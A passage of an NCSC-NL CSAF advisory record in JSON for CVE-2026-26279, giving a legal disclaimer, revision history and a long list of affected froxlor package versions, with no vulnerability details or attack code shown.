{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-26279",
        "tracking": {
            "current_release_date": "2026-03-20T09:44:16.224573Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-26279",
            "initial_release_date": "2026-03-03T12:11:51.303957Z",
            "revision_history": [
                {
                    "date": "2026-03-03T12:11:51.303957Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Products created (1).| References created (3)."
                },
                {
                    "date": "2026-03-03T12:11:53.275826Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-03T19:09:03.052095Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T19:09:04.733410Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-03T23:24:54.992215Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T23:25:05.092172Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-03T23:38:52.219885Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T23:38:58.979212Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T02:39:42.777085Z",
                    "number": "9",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-04T15:18:52.679286Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-04T15:19:02.023201Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T16:38:48.349024Z",
                    "number": "12",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-04T18:30:42.192959Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (105).| Product Identifiers created (105).| Products created (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T21:26:38.990736Z",
                    "number": "14",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-05T21:26:45.540353Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T14:56:21.122396Z",
                    "number": "16",
                    "summary": "EPSS updated."
                },
                {
                    "date": "2026-03-06T14:56:25.893700Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T14:32:30.669981Z",
                    "number": "18",
                    "summary": "EPSS updated."
                },
                {
                    "date": "2026-03-09T14:32:37.324699Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:44:12.530406Z",
                    "number": "20",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:44:15.351031Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "21"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0",
                                "product": {
                                    "name": "vers:unknown/0.10.0",
                                    "product_id": "CSAFPID-533796",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0-rc1",
                                "product": {
                                    "name": "vers:unknown/0.10.0-rc1",
                                    "product_id": "CSAFPID-3452625",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0-rc2",
                                "product": {
                                    "name": "vers:unknown/0.10.0-rc2",
                                    "product_id": "CSAFPID-3452626",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.1",
                                "product": {
                                    "name": "vers:unknown/0.10.1",
                                    "product_id": "CSAFPID-533797",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.10",
                                "product": {
                                    "name": "vers:unknown/0.10.10",
                                    "product_id": "CSAFPID-533786",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.11",
                                "product": {
                                    "name": "vers:unknown/0.10.11",
                                    "product_id": "CSAFPID-533794",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.12",
                                "product": {
                                    "name": "vers:unknown/0.10.12",
                                    "product_id": "CSAFPID-533789",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.13",
                                "product": {
                                    "name": "vers:unknown/0.10.13",
                                    "product_id": "CSAFPID-533787",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.14",
                                "product": {
                                    "name": "vers:unknown/0.10.14",
                                    "product_id": "CSAFPID-533801",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.15",
                                "product": {
                                    "name": "vers:unknown/0.10.15",
                                    "product_id": "CSAFPID-533800",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.16",
                                "product": {
                                    "name": "vers:unknown/0.10.16",
                                    "product_id": "CSAFPID-584149",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.17",
                                "product": {
                                    "name": "vers:unknown/0.10.17",
                                    "product_id": "CSAFPID-586043",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.18",
                                "product": {
                                    "name": "vers:unknown/0.10.18",
                                    "product_id": "CSAFPID-586041",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.19",
                                "product": {
                                    "name": "vers:unknown/0.10.19",
                                    "product_id": "CSAFPID-586039",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.2",
                                "product": {
                                    "name": "vers:unknown/0.10.2",
                                    "product_id": "CSAFPID-533785",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.20",
                                "product": {
                                    "name": "vers:unknown/0.10.20",
                                    "product_id": "CSAFPID-586038",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.21",
                                "product": {
                                    "name": "vers:unknown/0.10.21",
                                    "product_id": "CSAFPID-586040",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.22",
                                "product": {
                                    "name": "vers:unknown/0.10.22",
                                    "product_id": "CSAFPID-586042",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.23",
                                "product": {
                                    "name": "vers:unknown/0.10.23",
                                    "product_id": "CSAFPID-810715",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.23.1",
                                "product": {
                                    "name": "vers:unknown/0.10.23.1",
                                    "product_id": "CSAFPID-810709",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.23.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.24",
                                "product": {
                                    "name": "vers:unknown/0.10.24",
                                    "product_id": "CSAFPID-810704",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.25",
                                "product": {
                                    "name": "vers:unknown/0.10.25",
                                    "product_id": "CSAFPID-810719",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.25"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.26",
                                "product": {
                                    "name": "vers:unknown/0.10.26",
                                    "product_id": "CSAFPID-810711",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.26"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.27",
                                "product": {
                                    "name": "vers:unknown/0.10.27",
                                    "product_id": "CSAFPID-810712",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.27"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.28",
                                "product": {
                                    "name": "vers:unknown/0.10.28",
                                    "product_id": "CSAFPID-810714",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.28"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.29",
                                "product": {
                                    "name": "vers:unknown/0.10.29",
                                    "product_id": "CSAFPID-810705",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.29"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.29.1",
                                "product": {
                                    "name": "vers:unknown/0.10.29.1",
                                    "product_id": "CSAFPID-810707",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.29.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.3",
                                "product": {
                                    "name": "vers:unknown/0.10.3",
                                    "product_id": "CSAFPID-533791",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.30",
                                "product": {
                                    "name": "vers:unknown/0.10.30",
                                    "product_id": "CSAFPID-810717",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.30"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.31",
                                "product": {
                                    "name": "vers:unknown/0.10.31",
                                    "product_id": "CSAFPID-810708",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.31"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.32",
                                "product": {
                                    "name": "vers:unknown/0.10.32",
                                    "product_id": "CSAFPID-810716",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.32"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.33",
                                "product": {
                                    "name": "vers:unknown/0.10.33",
                                    "product_id": "CSAFPID-810713",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.33"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.34",
                                "product": {
                                    "name": "vers:unknown/0.10.34",
                                    "product_id": "CSAFPID-810710",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.34"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.34.1",
                                "product": {
                                    "name": "vers:unknown/0.10.34.1",
                                    "product_id": "CSAFPID-810720",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.34.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.35",
                                "product": {
                                    "name": "vers:unknown/0.10.35",
                                    "product_id": "CSAFPID-810718",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.35"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.35.1",
                                "product": {
                                    "name": "vers:unknown/0.10.35.1",
                                    "product_id": "CSAFPID-810706",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.35.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.36",
                                "product": {
                                    "name": "vers:unknown/0.10.36",
                                    "product_id": "CSAFPID-810703",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.36"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.37",
                                "product": {
                                    "name": "vers:unknown/0.10.37",
                                    "product_id": "CSAFPID-810721",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.37"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38",
                                "product": {
                                    "name": "vers:unknown/0.10.38",
                                    "product_id": "CSAFPID-835395",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.1",
                                "product": {
                                    "name": "vers:unknown/0.10.38.1",
                                    "product_id": "CSAFPID-835393",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.2",
                                "product": {
                                    "name": "vers:unknown/0.10.38.2",
                                    "product_id": "CSAFPID-835394",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.3",
                                "product": {
                                    "name": "vers:unknown/0.10.38.3",
                                    "product_id": "CSAFPID-835396",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.4",
                                "product": {
                                    "name": "vers:unknown/0.10.4",
                                    "product_id": "CSAFPID-533790",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.5",
                                "product": {
                                    "name": "vers:unknown/0.10.5",
                                    "product_id": "CSAFPID-533788",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.6",
                                "product": {
                                    "name": "vers:unknown/0.10.6",
                                    "product_id": "CSAFPID-533795",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.7",
                                "product": {
                                    "name": "vers:unknown/0.10.7",
                                    "product_id": "CSAFPID-533784",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.8",
                                "product": {
                                    "name": "vers:unknown/0.10.8",
                                    "product_id": "CSAFPID-533792",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.9",
                                "product": {
                                    "name": "vers:unknown/0.10.9",
                                    "product_id": "CSAFPID-533799",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0",
                                "product": {
                                    "name": "vers:unknown/2.0.0",
                                    "product_id": "CSAFPID-876020",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1",
                                "product": {
                                    "name": "vers:unknown/2.0.1",
                                    "product_id": "CSAFPID-876015",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.10",
                                "product": {
                                    "name": "vers:unknown/2.0.10",
                                    "product_id": "CSAFPID-879533",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.11",
                                "product": {
                                    "name": "vers:unknown/2.0.11",
                                    "product_id": "CSAFPID-882822",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.12",
                                "product": {
                                    "name": "vers:unknown/2.0.12",
                                    "product_id": "CSAFPID-882823",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.13",
                                "product": {
                                    "name": "vers:unknown/2.0.13",
                                    "product_id": "CSAFPID-897815",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.14",
                                "product": {
                                    "name": "vers:unknown/2.0.14",
                                    "product_id": "CSAFPID-945280",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.15",
                                "product": {
                                    "name": "vers:unknown/2.0.15",
                                    "product_id": "CSAFPID-945281",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.16",
                                "product": {
                                    "name": "vers:unknown/2.0.16",
                                    "product_id": "CSAFPID-945282",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.17",
                                "product": {
                                    "name": "vers:unknown/2.0.17",
                                    "product_id": "CSAFPID-945283",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.18",
                                "product": {
                                    "name": "vers:unknown/2.0.18",
                                    "product_id": "CSAFPID-945284",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.19",
                                "product": {
                                    "name": "vers:unknown/2.0.19",
                                    "product_id": "CSAFPID-945285",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.2",
                                "product": {
                                    "name": "vers:unknown/2.0.2",
                                    "product_id": "CSAFPID-876013",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.20",
                                "product": {
                                    "name": "vers:unknown/2.0.20",
                                    "product_id": "CSAFPID-945396",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.21",
                                "product": {
                                    "name": "vers:unknown/2.0.21",
                                    "product_id": "CSAFPID-945397",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.22",
                                "product": {
                                    "name": "vers:unknown/2.0.22",
                                    "product_id": "CSAFPID-3765852",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.23",
                                "product": {
                                    "name": "vers:unknown/2.0.23",
                                    "product_id": "CSAFPID-3765853",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.24",
                                "product": {
                                    "name": "vers:unknown/2.0.24",
                                    "product_id": "CSAFPID-3765854",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.3",
                                "product": {
                                    "name": "vers:unknown/2.0.3",
                                    "product_id": "CSAFPID-876017",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.4",
                                "product": {
                                    "name": "vers:unknown/2.0.4",
                                    "product_id": "CSAFPID-876018",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.5",
                                "product": {
                                    "name": "vers:unknown/2.0.5",
                                    "product_id": "CSAFPID-876019",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.6",
                                "product": {
                                    "name": "vers:unknown/2.0.6",
                                    "product_id": "CSAFPID-876016",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.7",
                                "product": {
                                    "name": "vers:unknown/2.0.7",
                                    "product_id": "CSAFPID-876014",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.8",
                                "product": {
                                    "name": "vers:unknown/2.0.8",
                                    "product_id": "CSAFPID-877915",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.9",
                                "product": {
                                    "name": "vers:unknown/2.0.9",
                                    "product_id": "CSAFPID-877916",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0",
                                "product": {
                                    "name": "vers:unknown/2.1.0",
                                    "product_id": "CSAFPID-1015399",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-beta1",
                                "product": {
                                    "name": "vers:unknown/2.1.0-beta1",
                                    "product_id": "CSAFPID-3765855",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-beta2",
                                "product": {
                                    "name": "vers:unknown/2.1.0-beta2",
                                    "product_id": "CSAFPID-3765856",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc1",
                                    "product_id": "CSAFPID-3765857",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc2",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc2",
                                    "product_id": "CSAFPID-3765858",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc3",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc3",
                                    "product_id": "CSAFPID-3765859",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.1",
                                "product": {
                                    "name": "vers:unknown/2.1.1",
                                    "product_id": "CSAFPID-1015398",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.2",
                                "product": {
                                    "name": "vers:unknown/2.1.2",
                                    "product_id": "CSAFPID-1095067",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.3",
                                "product": {
                                    "name": "vers:unknown/2.1.3",
                                    "product_id": "CSAFPID-1095068",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.4",
                                "product": {
                                    "name": "vers:unknown/2.1.4",
                                    "product_id": "CSAFPID-1095069",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.5",
                                "product": {
                                    "name": "vers:unknown/2.1.5",
                                    "product_id": "CSAFPID-1095070",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.6",
                                "product": {
                                    "name": "vers:unknown/2.1.6",
                                    "product_id": "CSAFPID-1095071",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.7",
                                "product": {
                                    "name": "vers:unknown/2.1.7",
                                    "product_id": "CSAFPID-1095072",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.8",
                                "product": {
